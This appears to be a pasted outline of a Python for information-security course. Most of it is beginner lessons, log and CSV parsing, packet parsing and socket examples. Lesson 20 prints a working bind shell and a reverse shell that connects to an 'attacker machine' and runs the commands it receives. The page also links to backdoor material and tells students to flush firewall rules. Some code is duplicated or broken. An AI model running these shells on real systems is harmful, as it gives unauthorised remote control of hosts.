Python_3 2019/2020

1.  
2. Class powerpoint slides:
3. this document is made for python 2.x https://pastebin.com/Bbtm5hFR
4. this is the python pastebin 3 https://pastebin.com/SCiEZsbg
5. http://45.63.104.73/PythonV3-1.pptx
6.  
7.  
8. this document is made for python 2.x
9. Courseware Lab Manual
10. http://45.63.104.73//Python-For-InfoSec-Pros-2015.pdf
11.  
12. these videos are python 2.x classes
13. Class Videos:
14. https://s3.amazonaws.com/infosecaddictsvideos/2017-07-31+09.32+Python+for+InfoSec+Professionals.mp4
15. https://s3.amazonaws.com/infosecaddictsvideos/2017-08-01+09.40+Python+for+InfoSec+Professionals.mp4
16. https://s3.amazonaws.com/infosecaddictsvideos/2017-08-02+09.37+Python+for+InfoSec+Professionals.mp4
17. https://s3.amazonaws.com/infosecaddictsvideos/2017-08-03+10.29+Python+for+InfoSec+Professionals.mp4
18.  
19. This link is broken
20. http://45.63.104.73/Python4SecurityPros-Files.zip
21.  
22.  
23. https://s3.amazonaws.com/infosecaddictsvirtualmachines/Win7x64.zip
24. user: infosecaddicts
25. pass: infosecaddicts
26.  
27.  
28.  
29. The youtube video playlist that I'd like for you to watch is located here:
30. https://www.youtube.com/playlist?list=PLEA1FEF17E1E5C0DA
31.  
32.  
33. How I did it:
34.  
35. Step 1: Watch and do the newboston Python video series twice
36. https://www.youtube.com/playlist?list=PLEA1FEF17E1E5C0DA
37.  
38.  
39. Step 2:  Watch and do the Google Python workshop twice
40. https://www.youtube.com/playlist?list=PLfZeRfzhgQzTMgwFVezQbnpc1ck0I6CQl
41.  
42.  
43. Step 3: Download all of the Python tools from PacketStorm and analyze the source code
44. https://packetstormsecurity.com/files/tags/python
45.  
46.  
47. This link is broken
48. Here is the code from Packet Storm
49. http://45.63.104.73/PythonReferenceCode.zip
50.  
51. I went through almost every single file and looked up the code that I didn't understand.
52. I also asked programmers to help me understand the lines of code that didn't make sense.
53. In the folder  RAC-Brute I actually had to hire a developer from an outsourcing website to comment,
54. and explain the tool to me.
55.  
56. This link is broken
57. Here is what I got out of doing that:
58. https://s3.amazonaws.com/infosecaddictsfiles/sorted-commented-python-files.zip
59.  
60.  
61.  
62. ##############################################
63. Distilled that into this:
64. http://45.63.104.73/Python-Courseware.zip
65.  
66.  
67.  
68.  
69.                            ##############################
70. ----------- ############### # Day 1: Python Fundamentals # ############### -----------
71.                            ##############################
72.  
73.  
74. ####################
75. # Installing Python#
76. ####################
77. Windows
78.  
79. https://www.python.org/downloads/
80.  
81. 32-Bit Version
82. https://www.python.org/ftp/python/3.7.3/python-3.7.3-webinstall.exe
83.  
84. 64-Bit Version
85. https://www.python.org/ftp/python/3.7.3/python-3.7.3-amd64-webinstall.exe
86.  
87.  
88. After you install Python in Windows the next thing you may want to install is IdleX:
89. http://idlex.sourceforge.net/features.html
90.  
91. ---------------------------Type This-----------------------------------
92.  
93. Linux
94. Debian/Ubuntu:      sudo apt-get install -y python
95. RHEL/CentOS/Fedora: sudo yum install -y python
96.  
97. -----------------------------------------------------------------------
98.  
99.  
100. After you install Python in Linux the next thing that you will need to do is install idle.
101.  
102. ---------------------------Type This-----------------------------------
103.  
104. sudo apt-get install -y idle
105.  
106. -----------------------------------------------------------------------
107.  
108. Open IDLE, and let's just dive right in.
109.  
110.  
111.  
112.  
113. #####################################
114. #Python Lesson   1: Simple Printing #
115. #####################################
116.  
117. ---------------------------Type This-----------------------------------
118. $ python
119.  
120. >>> print ("Today we are learning Python.")
121.  
122. -----------------------------------------------------------------------
123.  
124.  
125.  
126.  
127. #############################################
128. #Python Lesson   2: Simple Numbers and Math #
129. #############################################
130.  
131. ---------------------------Type This-----------------------------------
132.  
133. >>> 2+2
134.  
135. >>> 6-3
136.  
137. >>> 18/7
138.  
139. >>> 18.0/7
140.  
141. >>> 18.0/7.0
142.  
143. >>> 18/7
144.  
145. >>> 9%4
146. 1
147. >>> 8%4
148. 0
149. >>> 8.75%.5
150.  
151. >>> 6.*7
152.  
153. >>> 6*6*6
154.  
155. >>> 6**3
156.  
157. >>> 5**12
158.  
159. >>> -5**4
160.  
161.  
162.  
163. -----------------------------------------------------------------------
164.  
165.  
166.  
167. ###############################
168. #Python Lesson   3: Variables #
169. ###############################
170.  
171. ---------------------------Type This-----------------------------------
172.  
173. >>> x=18
174.  
175. >>> x+15
176.  
177. >>> x**3
178.  
179. >>> y=54
180.  
181. >>> g=int(input("Enter number here: "))
182. Enter number here: 43
183. >>> g
184.  
185. >>> g+32
186.  
187. >>> g**3
188.  
189. >>>
190.  
191. -----------------------------------------------------------------------
192.  
193.  
194.  
195.  
196.  
197. ###########################################
198. #Python Lesson   4: Modules and Functions #
199. ###########################################
200.  
201. ---------------------------Type This-----------------------------------
202.  
203. >>> 5**4
204.  
205. >>> pow(5,4)
206.  
207. >>> abs(-18)
208.  
209. >>> abs(5)
210.  
211. >>> floor(18.7)
212.  
213. >>> import math
214.  
215. >>> math.floor(18.7)
216.  
217. >>> math.sqrt(81)
218.  
219. >>> joe = math.sqrt
220.  
221. >>> joe(9)
222.  
223. >>> joe=math.floor
224.  
225. >>> joe(19.8)
226.  
227.  
228.  
229. -----------------------------------------------------------------------
230.  
231.  
232.  
233. #############################
234. #Python Lesson   5: Strings #
235. #############################
236.  
237. ---------------------------Type This-----------------------------------
238.  
239.  
240. >>> "XSS"
241.  
242. >>> 'SQLi'
243.  
244. >>> "Joe's a python lover"
245.  
246. >>> "Joe said \"InfoSec is fun\" to me"
247.  
248. >>> a = "Joe"
249.  
250. >>> b = "McCray"
251.  
252. >>> a, b
253.  
254. >>> a+b
255.  
256.  
257. -----------------------------------------------------------------------
258.  
259.  
260.  
261.  
262.  
263. ##################################
264. #Python Lesson   6: More Strings #
265. ##################################
266.  
267. ---------------------------Type This-----------------------------------
268.  
269.  
270. >>> num = 10
271.  
272. >>> num + 2
273.  
274. >>> "The number of open ports found on this system is ",  num
275.  
276. >>> num = str(18)
277.  
278. >>> "There are ", num, " vulnerabilities found in this environment."
279.  
280. >>> num2 = 46
281.  
282. >>> "As of 08/20/2012, the number of states that enacted the Security Breach Notification Law is ", + num2
283.  
284.  
285. -----------------------------------------------------------------------
286.  
287.  
288.  
289.  
290.  
291. #########################################
292. #Python Lesson   7: Sequences and Lists #
293. #########################################
294.  
295. ---------------------------Type This-----------------------------------
296.  
297. >>> attacks = ['Stack Overflow', 'Heap Overflow', 'Integer Overflow', 'SQL Injection', 'Cross-Site Scripting', 'Remote File Include']
298.  
299. >>> attacks
300. ['Stack Overflow', 'Heap Overflow', 'Integer Overflow', 'SQL Injection', 'Cross-Site Scripting', 'Remote File Include']
301.  
302. >>> attacks[3]
303. 'SQL Injection'
304.  
305. >>> attacks[-2]
306. 'Cross-Site Scripting'
307.  
308. >>> exit()
309.  
310.  
311. ###################################
312. # Level 8: Intro to Log Analysis #
313. ###################################
314.  
315.  
316. Log into your Linux host then execute the following commands:
317. -----------------------------------------------------------------------
318. NOTE: If you are still in your python interpreter then you must type exit() to get back to a regular command-prompt.
319.  
320.  
321.  
322. ---------------------------Type This-----------------------------------
323.  
324. wget http://pastebin.com/raw/85zZ5TZX
325.  
326. mv 85zZ5TZX access_log
327.  
328.  
329. cat access_log | grep 141.101.80.188
330.  
331. cat access_log | grep 141.101.80.187
332.  
333. cat access_log | grep 108.162.216.204
334.  
335. cat access_log | grep 173.245.53.160
336.  
337. ----------------------------------------------------------------------
338.  
339.  
340.  
341.  
342. Google the following terms:
343.     - Python read file
344.     - Python read line
345.     - Python read from file
346.  
347.  
348.  
349.  
350. ################################################################
351. #Python Lesson   9: Use Python to read in a file line by line  #
352. ################################################################
353.  
354.  
355. Reference:
356. http://cmdlinetips.com/2011/08/three-ways-to-read-a-text-file-line-by-line-in-python/
357.  
358.  
359.  
360. ---------------------------Type This-----------------------------------
361.  
362. nano logread1.py
363.  
364.  
365. ---------------------------Paste This-----------------------------------
366. ## Open the file with read only permit
367. f = open('access_log', "r")
368.  
369. ## use readlines to read all lines in the file
370. ## The variable "lines" is a list containing all lines
371. lines = f.readlines()
372.  
373. print (lines)
374.  
375.  
376. ## close the file after reading the lines.
377. f.close()
378.  
379. ----------------------------------------------------------------------
380.  
381.  
382.  
383.  
384. ---------------------------Type This-----------------------------------
385. python logread1.py
386. ----------------------------------------------------------------------
387.  
388.  
389.  
390. Google the following:
391.     - python difference between readlines and readline
392.     - python readlines and readline
393.  
394.  
395. Here is one student's solution - can you please explain each line of this code to me?
396.  
397.  
398. ---------------------------Type This-----------------------------------
399. exit()
400. nano ip_search.py
401.  
402. ---------------------------Type This-----------------------------------
403. exit()
404. nano ip_search.py
405.  
406. ---------------------------Paste This-----------------------------------
407. #!/usr/bin/python
408.  
409. f = open('access_log')
410.  
411. strUsrinput = input("Enter IP Address: ")
412.  
413. for line in iter(f):
414.    ip = line.split(" - ")[0]
415.    if ip == strUsrinput:
416.        print (line)
417.  
418. f.close()
419.  
420.  
421. ----------------------------------------------------------------------
422.  
423.  
424.  
425.  
426. ---------------------------Type This-----------------------------------
427. python ip_search.py
428. ----------------------------------------------------------------------
429.  
430.  
431.  
432. Working with another student after class we came up with another solution:
433.  
434. ---------------------------Type This-----------------------------------
435. nano ip_search2.py
436.  
437. ---------------------------Paste This-----------------------------------
438. #!/usr/bin/env python
439.  
440.  
441. # This line opens the log file
442. f=open('access_log',"r")
443.  
444. # This line takes each line in the log file and stores it as an element in the list
445. lines = f.readlines()
446.  
447.  
448. # This lines stores the IP that the user types as a var called userinput
449. userinput = input("Enter the IP you want to search for: ")
450.  
451.  
452.  
453. # This combination for loop and nested if statement looks for the IP in the list called lines and prints the entire line if found.
454. for ip in lines:
455.    if ip.find(userinput) != -1:
456.        print (ip)
457.  
458. ----------------------------------------------------------------------
459.  
460.  
461.  
462. ---------------------------Type This-----------------------------------
463. python ip_search2.py
464. ----------------------------------------------------------------------
465.  
466.  
467.  
468. ##################################################
469. # Lession 14: Look for web attacks in a log file #
470. ##################################################
471.  
472. In this lab we will be looking at the scan_log.py script and it will scan the server log to find out common hack attempts within your web server log.
473. Supported attacks:
474. 1.      SQL Injection
475. 2.      Local File Inclusion
476. 3.      Remote File Inclusion
477. 4.      Cross-Site Scripting
478.  
479.  
480. ---------------------------Type This-----------------------------------
481. the syntax of this code was changed to python 3
482. python scan_log.py --help
483.  
484. wget http://45.63.104.73/scan_log.py
485.  
486. ----------------------------------------------------------------------
487.  
488. The usage for scan_log.py is simple.  You feed it an apache log file.
489.  
490. ---------------------------Type This-----------------------------------
491.  
492. cat scan_log.py | less          (use your up/down arrow keys to look through the file)
493.  
494. ----------------------------------------------------------------------
495.  
496. Explain to me how this script works.
497. python scan_log.py --help
498.  
499.  
500.  
501.  
502. ################################
503. # Lesson 15: Parsing CSV Files #
504. ################################
505.  
506. Dealing with csv files
507.  
508. Reference:
509. http://www.pythonforbeginners.com/systems-programming/using-the-csv-module-in-python/
510.  
511. Type the following commands:
512. ---------------------------------------------------------------------------------------------------------
513.  
514. ---------------------------Type This-----------------------------------
515.  
516. wget http://45.63.104.73/class_nessus.csv
517.  
518. ----------------------------------------------------------------------
519.  
520. Example 1 - Reading CSV files
521. -----------------------------
522. #To be able to read csv formated files, we will first have to import the
523. #csv module.
524.  
525.  
526. ---------------------------Type This-----------------------------------
527. $ python
528. f = open('class_nessus.csv', 'rb')
529. for row in f:
530.    print (row)
531.        
532.  
533. ----------------------------------------------------------------------
534.  
535.  
536.  
537. Example 2 - Reading CSV files
538. -----------------------------
539.  
540. ---------------------------Type This-----------------------------------
541.  
542. vi readcsv.py
543.  
544. ---------------------------Paste This-----------------------------------
545. #!/usr/bin/python
546. f = open('class_nessus.csv', 'rb')      # opens the csv file
547. try:
548.     for row in f:           # iterates the rows of the file in orders
549.         print (row)             # prints each row
550. finally:
551.     f.close()               # closing
552.  
553.  
554.  
555. ----------------------------------------------------------------------
556.  
557.  
558.  
559. Ok, now let's run this thing.
560.  
561. --------------------------Type This-----------------------------------
562. python readcsv.py
563.  
564. python readcsv.py class_nessus.csv
565. ----------------------------------------------------------------------
566.  
567.  
568.  
569.  
570. Example 3 - - Reading CSV files
571. -------------------------------
572.  
573. ---------------------------Type This-----------------------------------
574.  
575. vi readcsv2.py
576.  
577. ---------------------------Paste This-----------------------------------
578. #!/usr/bin/python
579. # This program will then read it and displays its contents.
580.  
581. ifile  = open('class_nessus.csv', "rb")
582.  
583.  
584. rownum = 0
585. for row in ifile:
586.     # Save header row.
587.     if rownum == 0:
588.         header = row
589.     else:
590.         colnum = 0
591.         for col in row:
592.             print ('%-8s: %s' % (header[colnum], col))
593.             colnum += 1
594.     rownum += 1
595.  
596. ifile.close()
597.  
598.  
599.  
600. ----------------------------------------------------------------------
601.  
602.  
603.  
604. ---------------------------Type This-----------------------------------
605.  
606. python readcsv2.py | less
607.  
608.  
609. ----------------------------------------------------------------------
610.  
611.  
612.  
613.  
614.  
615.  
616.  
617.  
618.  
619. ---------------------------Type This-----------------------------------
620.  
621. vi readcsv3.py
622.  
623. ---------------------------Paste This-----------------------------------
624. #!/usr/bin/python
625. import csv
626. f = open('class_nessus.csv', 'r')
627. try:
628.     rownum = 0
629.     reader = csv.reader(f)
630.     for row in reader:
631.         #Save header row.
632.         if rownum == 0:
633.             header = row
634.         else:
635.             colnum = 0
636.             if row[3].lower() == 'high':
637.                 print(('%-1s: %s     %-1s: %s     %-1s: %s     %-1s: %s' % (header[3], row[3],header[4], row[4],header[5], row[5],header[6], row[6])))
638.         rownum += 1
639. finally:
640.     f.close()
641.  
642. -----------------------------------------------------------------------
643.  
644.  
645. ---------------------------Type This-----------------------------------
646.  
647. python readcsv3.py | less
648. -----------------------------------------------------------------------
649.  
650.  
651.  
652. ---------------------------Type This-----------------------------------
653.  
654. vi readcsv4.py
655. -----------------------------------------------------------------------
656.  
657. ---------------------------Paste This-----------------------------------
658.  
659. #!/usr/bin/python
660. import csv
661. f = open('class_nessus.csv', 'r')
662. try:
663.     print('/---------------------------------------------------/')
664.     rownum = 0
665.     hosts = {}
666.     reader = csv.reader(f)
667.     for row in reader:
668.         # Save header row.
669.         if rownum == 0:
670.             header = row
671.         else:
672.             colnum = 0
673.             if row[3].lower() == 'high' and row[4] not in hosts:
674.                 hosts[row[4]] = row[4]
675.                 print('%-1s: %s     %-1s: %s     %-1s: %s     %-1s: %s' % (header[3], row[3],header[4], row[4],header[5], row[5],header[6], row[6]))
676.         rownum += 1
677. finally:
678.     f.close()
679.  
680.  
681. python readcsv4.py | less
682.  
683. ----------------------------------------------------------------------
684.  
685.  
686.  
687.  
688.  
689. #################################################
690. # Lesson 16: Parsing Packets with Python's DPKT #
691. #################################################
692. The first thing that you will need to do is install dpkt.
693.  
694. ---------------------------Type This-----------------------------------
695.  
696.  
697.  pip install dpkt
698.  
699. ----------------------------------------------------------------------
700.  
701.  
702.  
703. Now cd to your courseware directory, and the cd into the subfolder '2-PCAP-Parsing/Resources'.
704. Run tcpdump to capture a .pcap file that we will use for the next exercise
705.  
706. ---------------------------Type This-----------------------------------
707.  
708. sudo tcpdump -ni wlp8s0 -s0 -w quick.pcap
709.  
710. ----------------------------------------------------------------------
711.  
712.  
713. --open another command prompt--
714.  
715. ---------------------------Type This-----------------------------------
716.  
717.  
718. wget http://packetlife.net/media/library/12/tcpdump.pdf
719.  
720. ----------------------------------------------------------------------
721.  
722. Let's do something simple:
723.  
724. ---------------------------Type This-----------------------------------
725.  
726.  
727. vi quickpcap.py
728.  
729. ---------------------------Paste This-----------------------------------
730.  
731. #!/usr/bin/python
732. import dpkt
733.  
734. # Simple script to read the timestamps in a pcap file
735. # Reference: http://superbabyfeng.blogspot.com/2009/05/dpkt-tutorial-0-simple-example-how-to.html
736.  
737. f = open("quick.pcap","rb")
738. pcap = dpkt.pcap.Reader(f)
739.  
740. for ts, buf in pcap:
741.     print (ts)
742.  
743. f.close()
744.  
745.  
746.  
747. ----------------------------------------------------------------------
748.  
749.  
750. Now let's run the script we just wrote
751.  
752. ---------------------------Type This-----------------------------------
753.  
754. python quickpcap.py
755.  
756. ----------------------------------------------------------------------
757.  
758.  
759.  
760. How dpkt breaks down a packet:
761.  
762. Reference:
763. http://superbabyfeng.blogspot.com/2009/05/dpkt-tutorial-1-dpkt-sub-modules.html
764.  
765.     src: the MAC address of SOURCE.
766.     dst: The MAC address of DESTINATION
767.     type: The protocol type of contained ethernet payload.
768.  
769. The allowed values are listed in the file "ethernet.py",
770. such as:
771. a) ETH_TYPE_IP: It means that the ethernet payload is IP layer data.
772. b) ETH_TYPE_IPX: Means that the ethernet payload is IPX layer data.
773.  
774.  
775. References:
776. http://stackoverflow.com/questions/6337878/parsing-pcap-files-with-dpkt-python
777.  
778.  
779.  
780.  
781.  
782.  
783.  
784. Ok - now let's have a look at pcapparsing.py
785.  
786. ---------------------------Type This-----------------------------------
787.  
788.  
789. sudo tcpdump -ni wlp8s0 -s0 -w capture-100.pcap
790.  
791. ----------------------------------------------------------------------
792.  
793. --open another command prompt--
794.  
795. ---------------------------Type This-----------------------------------
796.  
797.  
798. wget http://packetlife.net/media/library/13/Wireshark_Display_Filters.pdf
799.  
800. ----------------------------------------------------------------------
801.  
802.  
803. Ok - now let's have a look at pcapparsing.py
804.  
805.  
806. --------------------------------------------------------------
807.  
808. ****************************************
809. import socket
810. import dpkt
811. import sys
812. f = open('capture-100.pcap','rb')
813. pcapReader = dpkt.pcap.Reader(f)
814.  
815. for ts,data in pcapReader:
816.     ether = dpkt.ethernet.Ethernet(data)
817.     if ether.type != dpkt.ethernet.ETH_TYPE_IP: raise
818.     ip = ether.data
819.     tcp = ip.data
820.     src = socket.inet_ntoa(ip.src)
821.     srcport = tcp.sport
822.     dst = socket.inet_ntoa(ip.dst)
823.     dstport = tcp.dport
824.     print(("src: %s (port : %s)-> dest: %s (port %s)" % (src,srcport ,dst,dstport)))
825.  
826. f.close()
827.  
828. ----------------------------------------------------------------------
829.  
830.  
831.  
832. OK - let's run it:
833.  
834. ---------------------------Type This-----------------------------------
835.  
836. python pcapparsing.py
837.  
838. ----------------------------------------------------------------------
839.  
840. ----------------------------------------------------------------------
841.  
842.  
843. running this script might throw an error like this:
844.  
845. Traceback (most recent call last):
846.  File "pcapparsing.py", line 9, in <module>
847.    if ether.type != dpkt.ethernet.ETH_TYPE_IP: raise
848.  
849.  
850. If it does it is just because your packet has something in it that we didn't specify (maybe ICMP, or something)
851.  
852.  
853.  
854.  
855. Your homework for today...
856.  
857.  
858. Rewrite this pcapparsing.py so that it prints out the timestamp, the source and destination IP addresses, and the source and destination ports.
859.  
860. ***********************************************************
861.  
862.  
863.  
864.  
865. Your challenge is to fix the Traceback error
866.  
867.  
868.  
869.  
870. ----------------------------------------------------------------------
871.  
872.  
873. running this script might throw an error like this:
874.  
875. Traceback (most recent call last):
876.   File "pcapparsing.py", line 9, in <module>
877.     if ether.type != dpkt.ethernet.ETH_TYPE_IP: raise
878.  
879.  
880. If it does it is just because your packet has something in it that we didn't specify (maybe ICMP, or something)
881.  
882.  
883.  
884.  
885. Your homework for today...
886.  
887.  
888. Rewrite this pcapparsing.py so that it prints out the timestamp, the source and destination IP addresses, and the source and destination ports.
889.  
890. ***********************************************************
891.  
892.  
893.  
894.  
895. Your challenge is to fix the Traceback error
896.  
897. ---------------------------Paste This-----------------------------------
898.  
899. import pcapy
900. import dpkt
901. import sys
902. import socket
903. import struct
904.  
905. SINGLE_SHOT = False
906.  
907. # list all the network devices
908. pcapy.findalldevs()
909.  
910. iface = "wlp8s0"
911. filter = "arp"
912. max_bytes = 1024
913. promiscuous = False
914. read_timeout = 100 # in milliseconds
915.  
916. pc = pcapy.open_live( iface, max_bytes, promiscuous, read_timeout )
917. pc.setfilter( filter )
918.  
919. # callback for received packets
920. def recv_pkts(hdr, data):
921.    packet = dpkt.ethernet.Ethernet( data )
922.  
923.    print (type( packet.data ))
924.    print ("ipsrc: %s, ipdst: %s" %( \
925.                 socket.inet_ntoa( packet.data.spa ), \
926.                 socket.inet_ntoa( packet.data.tpa ) ))
927.  
928.    print ("macsrc: %s, macdst: %s " % (
929.                "%x:%x:%x:%x:%x:%x" % struct.unpack("BBBBBB",packet.data.sha),
930.                "%x:%x:%x:%x:%x:%x" % struct.unpack("BBBBBB",packet.data.tha ) ))
931.  
932. if SINGLE_SHOT:
933.    header, data = pc.next()
934.    sys.exit(0)
935. else:
936.    packet_limit = -1 # infinite
937.    pc.loop( packet_limit, recv_pkts ) # capture packets
938.  
939.  
940. ----------------------------------------------------------------------
941.  
942.  
943.  
944.  
945. ##################################
946. # Day 1 Homework videos to watch #
947. ##################################
948. Here is your first set of youtube videos that I'd like for you to watch:
949. https://www.youtube.com/playlist?list=PLEA1FEF17E1E5C0DA (watch videos 1-10)
950.  
951. How to install idle in Mac OS X:
952. https://stackoverflow.com/questions/8792044/how-do-i-launch-idle-the-development-environment-for-python-on-mac-os-10-7
953.  
954.  
955.  
956.  
957. ########################
958. # Day 1 Challenge task #
959. ########################
960. Rewrite this pcapparsing.py so that it prints out the timestamp, the source and destination IP addresses, and the source and destination ports.
961.  
962. Running the current version of the script may give you an error like this:
963.  
964. Traceback (most recent call last):
965.   File "pcapparsing.py", line 9, in <module>
966.     if ether.type != dpkt.ethernet.ETH_TYPE_IP: raise
967.  
968.  
969. If it does it is just because your packet has something in it that we didn't specify (maybe ICMP, or something)
970.  
971. Your challenge task is to fix the Traceback error
972.  
973.  
974.  
975.  
976.  
977.  
978.                            #################################
979. ----------- ############### # Day 2: Python sockets & Scapy # ############### -----------
980.                            #################################
981.  
982.  
983.  
984.  
985.  
986. #############################################
987. # Lesson 17: Python Sockets & Port Scanning #
988. #############################################
989.  
990. ---------------------------Type This-----------------------------------
991.  
992. $ sudo /sbin/iptables -F
993.  
994. $ ncat -l -v -p 1234
995.  
996. ----------------------------------------------------------------------
997.  
998.  
999.  
1000. --open another terminal--
1001.  
1002. ---------------------------Type This-----------------------------------
1003.  
1004. python
1005.  
1006. import socket
1007. s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
1008. s.connect(('localhost', 1234))
1009. s.send('Hello World'.encode())
1010. data = s.recv(1024)
1011. s.close()
1012.  
1013. print ('Received', data)
1014.  
1015.  
1016.  
1017. ----------------------------------------------------------------------
1018.  
1019.  
1020.  
1021.  
1022. ########################################
1023. # Lesson 18: TCP Client and TCP Server #
1024. ########################################
1025.  
1026.  
1027. ---------------------------Type This-----------------------------------
1028.  
1029.  
1030. vi tcpclient.py
1031.  
1032. ---------------------------Paste This-----------------------------------
1033.  
1034.  
1035. #!/usr/bin/python
1036. # tcpclient.py
1037.  
1038. #!/usr/bin/python
1039. # tcpclient.py
1040.  
1041. import socket
1042.  
1043. s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
1044. hostport = ("127.0.0.1", 1337)
1045. s.connect(hostport)
1046. s.send('Hello World'.encode())
1047. buf = s.recv(1024)
1048. print ("Received", buf)
1049.  
1050.  
1051.  
1052.  
1053. ----------------------------------------------------------------------
1054.  
1055.  
1056. ---------------------------Type This-----------------------------------
1057.  
1058.  
1059.  
1060.  
1061.  
1062.  
1063. vi tcpserver.py
1064.  
1065.  
1066. ---------------------------Paste This-----------------------------------
1067.  
1068.  
1069. #!/usr/bin/python
1070. # tcpserver.py
1071.  
1072. import socket
1073.  
1074. import socket
1075.  
1076. s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
1077. hostport = ("localhost", 1337)
1078. s.bind(hostport)
1079. s.listen(10)
1080. while 1:
1081.     cli,addr = s.accept()
1082.     print ("Connection from", addr)
1083.     buf = cli.recv(1024)
1084.     print ("Received", buf)
1085.     if buf == "Hello\n":
1086.         cli.send("Server ID 1\n")
1087.     cli.close()
1088. s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
1089. hostport = ("", 1337)
1090. s.bind(hostport)
1091. s.listen(10)
1092. while 1:
1093.     cli,addr = s.accept()
1094.     print "Connection from", addr
1095.     buf = cli.recv(1024)
1096.     print "Received", buf
1097.     if buf == "Hello\n":
1098.         cli.send("Server ID 1\n")
1099.     cli.close()
1100.  
1101.  
1102.  
1103.  
1104. ----------------------------------------------------------------------
1105.  
1106.  
1107. ---------------------------Type This-----------------------------------
1108.  
1109.  
1110. python tcpserver.py
1111.  
1112.  
1113. --open another terminal--
1114. python tcpclient.py
1115.  
1116.  
1117. ########################################
1118. # Lesson 19: UDP Client and UDP Server #
1119. ########################################
1120.  
1121. ---------------------------Type This-----------------------------------
1122.  
1123. vi udpclient.py
1124.  
1125.  
1126.  
1127. ---------------------------Paste This-----------------------------------
1128.  
1129. import socket
1130.  
1131. msgFromClient       = "Hello UDP Server"
1132. bytesToSend         = str.encode(msgFromClient)
1133. serverAddressPort   = ("127.0.0.1", 20001)
1134. bufferSize          = 1024
1135.  
1136. # Create a UDP socket at client side
1137. UDPClientSocket = socket.socket(family=socket.AF_INET, type=socket.SOCK_DGRAM)
1138. # Send to server using created UDP socket
1139. UDPClientSocket.sendto(bytesToSend, serverAddressPort)
1140. msgFromServer = UDPClientSocket.recvfrom(bufferSize)
1141. msg = "Message from Server {}".format(msgFromServer[0])
1142. print(msg)
1143.  
1144. ----------------------------------------------------------------------
1145.  
1146.  
1147.  
1148.  
1149. ---------------------------Type This-----------------------------------
1150.  
1151.  
1152. vi udpserver.py
1153.  
1154.  
1155. ---------------------------Paste This-----------------------------------
1156.  
1157. import socket
1158.  
1159. localIP     = "127.0.0.1"
1160. localPort   = 20001
1161. bufferSize  = 1024
1162. msgFromServer       = "Hello UDP Client"
1163. bytesToSend         = str.encode(msgFromServer)
1164. # Create a datagram socket
1165. UDPServerSocket = socket.socket(family=socket.AF_INET, type=socket.SOCK_DGRAM)
1166. # Bind to address and ip
1167. UDPServerSocket.bind((localIP, localPort))
1168. print("UDP server up and listening")
1169. # Listen for incoming datagrams
1170. while(True):
1171.    bytesAddressPair = UDPServerSocket.recvfrom(bufferSize)
1172.    message = bytesAddressPair[0]
1173.    address = bytesAddressPair[1]
1174.    clientMsg = "Message from Client:{}".format(message)
1175.    clientIP  = "Client IP Address:{}".format(address)
1176.    print(clientMsg)
1177.    print(clientIP)
1178.  
1179.    # Sending a reply to client
1180.    UDPServerSocket.sendto(bytesToSend, address)
1181.  
1182. ----------------------------------------------------------------------
1183.  
1184.  
1185. ---------------------------Type This-----------------------------------
1186.  
1187.  
1188. python udpserver.py
1189.  
1190.  
1191. --open another terminal--
1192. python udpclient.py
1193.  
1194.  
1195.  
1196. ----------------------------------------------------------------------
1197.  
1198.  
1199. ######################################
1200. # Lesson 20: Bind and Reverse Shells #
1201. ######################################
1202.  
1203. ---------------------------Type This-----------------------------------
1204.  
1205.  
1206. vi simplebindshell.py
1207.  
1208. ---------------------------Paste This-----------------------------------
1209.  
1210. #!/bin/python
1211. import os,sys,socket
1212.  
1213. #!/bin/python
1214. import os,sys,socket
1215.  
1216. ls = socket.socket(socket.AF_INET,socket.SOCK_STREAM);
1217. print ('-Creating socket..')
1218. port = 31337
1219. try:
1220.     ls.bind(('', port))
1221.     print ('-Binding the port on ')
1222.     ls.listen(1)
1223.     print ('-Listening, ')
1224.     (conn, addr) = ls.accept()
1225.     print ('-Waiting for connection...')
1226.     cli= conn.fileno()
1227.     print ('-Redirecting shell...')
1228.     os.dup2(cli, 0)
1229.     print ('In, ')
1230.     os.dup2(cli, 1)
1231.     print ('Out, ')
1232.     os.dup2(cli, 2)
1233.     print ('Err')  
1234.     print ('Done!')
1235.     arg0=('/bin/sh')
1236.     arg1=('-a')
1237.     args=[arg0]+[arg1]
1238.     os.execv(arg0, args)
1239. except(socket.error):
1240.     print ('fail\n')
1241.     conn.close()
1242.     sys.exit(1)
1243.  
1244.  
1245. ----------------------------------------------------------------------
1246.  
1247.  
1248.  
1249. ---------------------------Type This-----------------------------------
1250.  
1251. nc TARGETIP 31337
1252.  
1253. ----------------------------------------------------------------------
1254.  
1255.  
1256. ---------------------
1257. Preparing the target for a reverse shell
1258.  
1259. ---------------------------Type This-----------------------------------
1260.  
1261. $ ncat -lvp 4444
1262.  
1263. --open another terminal--
1264. wget https://www.trustedsec.com/files/simple_py_shell.py
1265.  
1266. vi simple_py_shell.py
1267.  
1268.  
1269. #!/usr/bin/python
1270. # imports here
1271. # Copyright 2012 TrustedSec, LLC. All rights reserved.
1272. #
1273. # This piece of software code is licensed under the FreeBSD license..
1274. #
1275. # Visit http://www.freebsd.org/copyright/freebsd-license.html for more information.
1276. import socket,subprocess
1277. HOST = '192.168.1.54'    # The remote host
1278. PORT = 4444            # The same port as used by the server
1279. s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
1280. # connect to attacker machine
1281. s.connect((HOST, PORT))
1282. # send we are connected
1283. s.send('[*] Connection Established!')
1284. # start loop
1285. while 1:
1286.     # recieve shell command
1287.     data = s.recv(1024)
1288.     # if its quit, then break out and close socket
1289.     if data == "quit": break
1290.     # do shell command
1291.     proc = subprocess.Popen(data, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
1292.     # read output
1293.     stdout_value = proc.stdout.read() + proc.stderr.read()
1294.     # send output to attacker
1295.     s.send(stdout_value)
1296. # close socket
1297. s.close()
1298.  
1299.  
1300.  
1301.  
1302. -------------------------------
1303. Tricky shells
1304.  
1305. Reference:
1306. http://securityweekly.com/2011/10/python-one-line-shell-code.html
1307. http://resources.infosecinstitute.com/creating-undetectable-custom-ssh-backdoor-python-z/
1308.  
1309.  
1310.  
1311. What is os.dup2?
1312. https://stackoverflow.com/questions/45517168/what-does-os-dup2-do-in-a-python-reverse-shell-when-used-with-the-socket
1313.  
1314.  
1315.  
1316.  
1317.  
1318. Lots of reverse shells in different languages
1319. ---------------------------------------------------------------------
1320.  
1321.  
1322.  
